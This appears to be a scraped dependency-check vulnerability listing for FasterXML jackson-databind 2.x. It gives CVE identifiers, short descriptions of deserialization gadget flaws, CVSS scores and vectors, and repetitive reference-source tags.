af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-9548 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-10672 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms). CWE-502 Deserialization of Untrusted Data, NVD-CWE-Other
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-10673 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus). CWE-502 Deserialization of Untrusted Data, NVD-CWE-Other
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-10968 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-10969 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11111 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11112 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11113 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-10650 suppress
A deserialization flaw was discovered in jackson-databind through 2.9.10.4. It could allow an unauthenticated user to perform code execution via ignite-jta or quartz-core: org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup, org.apache.ignite.cache.jta.jndi.CacheJndiTmFactory, and org.quartz.utils.JNDIConnectionProvider. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-11619 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-11620 suppress
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-14060 suppress
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-14061 suppress
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-14062 suppress
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-14195 suppress
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2020-24616 suppress
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-24750 suppress
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-35490 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-35491 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,TECHNICAL_DESCRIPTION,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-35728 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl). CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-36179 suppress
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:P References:
